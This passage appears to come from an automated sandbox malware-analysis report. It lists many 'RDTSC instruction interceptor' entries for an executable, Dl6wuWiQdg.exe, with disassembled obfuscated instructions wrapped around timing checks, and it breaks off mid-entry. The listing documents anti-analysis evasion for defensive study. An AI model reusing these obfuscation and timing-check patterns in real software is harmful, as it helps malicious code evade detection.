                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 107FE96 second address: 107FEF4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F36B8D8D088h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 pushad 0x00000013 mov dword ptr [ebp+122D18CFh], eax 0x00000019 popad 0x0000001a push dword ptr [ebp+122D24D0h] 0x00000020 mov dword ptr [ebp+12480286h], edi 0x00000026 call 00007F36B8D8D089h 0x0000002b jmp 00007F36B8D8D099h 0x00000030 push eax 0x00000031 jmp 00007F36B8D8D08Ch 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 107FEF4 second address: 107FEF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 107FEF8 second address: 107FEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 107FEFC second address: 107FF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jne 00007F36B8869BF6h 0x00000013 popad 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 107FF1A second address: 107FF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 107FF1F second address: 107FF26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10818D4 second address: 10818E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10818E4 second address: 10818EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10814AA second address: 10814B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F36B8D8D086h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 10833CD second address: 10833E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jmp 00007F36B8869C05h 0x0000000b pop edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9EF0F second address: F9EF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: F9EF15 second address: F9EF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A8040B second address: 4A8040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A8040F second address: 4A80415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A80415 second address: 4A8041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A8041B second address: 4A8041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A8041F second address: 4A804A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F36B8D8D08Bh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F36B8D8D094h 0x00000019 and ax, A168h 0x0000001e jmp 00007F36B8D8D08Bh 0x00000023 popfd 0x00000024 mov cx, FB5Fh 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov si, dx 0x00000031 pushfd 0x00000032 jmp 00007F36B8D8D093h 0x00000037 or cx, 5D5Eh 0x0000003c jmp 00007F36B8D8D099h 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A804A8 second address: 4A804AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A804AE second address: 4A804DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F36B8D8D090h 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A804DE second address: 4A804ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A804ED second address: 4A80513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A80513 second address: 4A80517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A80517 second address: 4A8051D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A8055D second address: 4A80563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0705 second address: 4AA0760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F36B8D8D091h 0x0000000b and al, FFFFFFD6h 0x0000000e jmp 00007F36B8D8D091h 0x00000013 popfd 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F36B8D8D08Ch 0x0000001d or si, DFF8h 0x00000022 jmp 00007F36B8D8D08Bh 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b movzx eax, bx 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0760 second address: 4AA0764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0764 second address: 4AA076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA076A second address: 4AA07A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F36B8869BFEh 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F36B8869C07h 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA07A5 second address: 4AA07AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA07AB second address: 4AA07AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA07AF second address: 4AA07E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F36B8D8D099h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA07E0 second address: 4AA0814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F36B8869C09h 0x0000000a and cl, 00000016h 0x0000000d jmp 00007F36B8869C01h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0814 second address: 4AA0892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 pushfd 0x00000006 jmp 00007F36B8D8D098h 0x0000000b add si, B568h 0x00000010 jmp 00007F36B8D8D08Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a pushad 0x0000001b movzx eax, dx 0x0000001e movsx edx, si 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007F36B8D8D094h 0x0000002b pop eax 0x0000002c pushfd 0x0000002d jmp 00007F36B8D8D08Bh 0x00000032 adc ah, 0000000Eh 0x00000035 jmp 00007F36B8D8D099h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0892 second address: 4AA090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F36B8869BFCh 0x00000010 pushfd 0x00000011 jmp 00007F36B8869C02h 0x00000016 xor si, 1EE8h 0x0000001b jmp 00007F36B8869BFBh 0x00000020 popfd 0x00000021 popad 0x00000022 lea eax, dword ptr [ebp-04h] 0x00000025 jmp 00007F36B8869C06h 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F36B8869C07h 0x00000032 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA090D second address: 4AA0925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D094h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0925 second address: 4AA0929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0993 second address: 4AA0999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0999 second address: 4AA09C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F36B8869BFAh 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA09C1 second address: 4AA09C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA09C5 second address: 4AA09CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA09CB second address: 4AA09D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA09D1 second address: 4AA09D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0A35 second address: 4AA0A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0A39 second address: 4AA0A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0A3F second address: 4AA0A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0A45 second address: 4AA0A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0A49 second address: 4AA0A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0A4D second address: 4AA0A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, esi 0x0000000a jmp 00007F36B8869C04h 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0A6F second address: 4AA0A7F instructions: 0x00000000 rdtsc 0x00000002 mov ah, bl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0A7F second address: 4AA0A92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0A92 second address: 4AA0AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D094h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0AAA second address: 4AA0AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4AA0AAE second address: 4A90194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f cmp eax, 00000000h 0x00000012 setne al 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F36B8D8D087h 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007F36BCA5A43Ah 0x00000027 mov edi, edi 0x00000029 jmp 00007F36B8D8D090h 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 mov ecx, 6B97B39Dh 0x00000035 movzx ecx, dx 0x00000038 popad 0x00000039 push eax 0x0000003a jmp 00007F36B8D8D094h 0x0000003f xchg eax, ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90194 second address: 4A90198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90198 second address: 4A9019C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A9019C second address: 4A901A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A901A2 second address: 4A90218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F36B8D8D090h 0x00000010 sub esp, 2Ch 0x00000013 jmp 00007F36B8D8D090h 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov esi, edi 0x0000001e pushfd 0x0000001f jmp 00007F36B8D8D099h 0x00000024 or ecx, 73D3D706h 0x0000002a jmp 00007F36B8D8D091h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90218 second address: 4A90288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d push ebx 0x0000000e pushfd 0x0000000f jmp 00007F36B8869C06h 0x00000014 sbb esi, 2D179008h 0x0000001a jmp 00007F36B8869BFBh 0x0000001f popfd 0x00000020 pop ecx 0x00000021 popad 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F36B8869C00h 0x0000002c xor ax, B268h 0x00000031 jmp 00007F36B8869BFBh 0x00000036 popfd 0x00000037 mov ax, A05Fh 0x0000003b popad 0x0000003c rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90317 second address: 4A90345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 0363967Eh 0x00000009 popad 0x0000000a call 00007F36B8D8D08Fh 0x0000000f movzx eax, dx 0x00000012 pop edi 0x00000013 popad 0x00000014 sub edi, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F36B8D8D08Ch 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90345 second address: 4A9039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushfd 0x00000007 jmp 00007F36B8869BFDh 0x0000000c and si, DB66h 0x00000011 jmp 00007F36B8869C01h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a inc ebx 0x0000001b pushad 0x0000001c jmp 00007F36B8869BFCh 0x00000021 popad 0x00000022 test al, al 0x00000024 pushad 0x00000025 call 00007F36B8869BFDh 0x0000002a mov ecx, 028CA577h 0x0000002f pop eax 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A9039A second address: 4A903DF instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F36B8D8D270h 0x0000000e pushad 0x0000000f mov dh, ch 0x00000011 call 00007F36B8D8D093h 0x00000016 movzx ecx, di 0x00000019 pop ebx 0x0000001a popad 0x0000001b lea ecx, dword ptr [ebp-14h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F36B8D8D097h 0x00000025 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A903DF second address: 4A9041E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F36B8869C00h 0x0000000c sbb ax, 1D58h 0x00000011 jmp 00007F36B8869BFBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [ebp-14h], edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F36B8869BFBh 0x00000025 mov edx, esi 0x00000027 popad 0x00000028 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A9041E second address: 4A90424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90424 second address: 4A90428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A9043E second address: 4A90479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F36B8D8D091h 0x00000014 sbb ecx, 2421ED06h 0x0000001a jmp 00007F36B8D8D091h 0x0000001f popfd 0x00000020 push ecx 0x00000021 pop edx 0x00000022 popad 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90479 second address: 4A90495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8869C08h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A904C2 second address: 4A904C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A904C7 second address: 4A90510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 pushfd 0x00000006 jmp 00007F36B8869BFFh 0x0000000b xor esi, 0552F6FEh 0x00000011 jmp 00007F36B8869C09h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test eax, eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F36B8869BFDh 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90510 second address: 4A90520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D08Ch 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90520 second address: 4A90524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90524 second address: 4A90538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F372AC5AFE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90538 second address: 4A9053E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A9053E second address: 4A90544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90544 second address: 4A90548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\Dl6wuWiQdg.exeRDTSC instruction interceptor: First address: 4A90548 second address: 4A90630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F36B8D8D0B7h 0x00000011 pushad 0x00000012 mov ebx, ecx 0x00000014 mov si, 5BFFh 0x00000018 popad 0x00000019 cmp dword ptr [ebp-14h], edi 0x0000001c pushad 0x0000001d mov ecx, 4E5BCBF7h 0x00000022 mov di, ax 0x00000025 popad 0x00000026 jne 00007F372AC5AFABh 0x0000002c pushad 0x0000002d mov cx, 1F0Bh 0x00000031 jmp 00007F36B8D8D090h 0x00000036 popad 0x00000037 mov ebx, dword ptr [ebp+08h] 0x0000003a jmp 00007F36B8D8D090h 0x0000003f lea eax, dword ptr [ebp-2Ch] 0x00000042 jmp 00007F36B8D8D090h 0x00000047 xchg eax, esi 0x00000048 jmp 00007F36B8D8D090h 0x0000004d push eax 0x0000004e pushad 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F36B8D8D097h 0x00000056 sbb ecx, 3E537BEEh 0x0000005c jmp 00007F36B8D8D099h 0x00000061 popfd 0x00000062 mov si, 8377h 0x00000066 popad 0x00000067 jmp 00007F36B8D8D08Ch 0x0000006c popad 0x0000006d xchg eax, esi 0x0000006e push eax 0x0000006f push 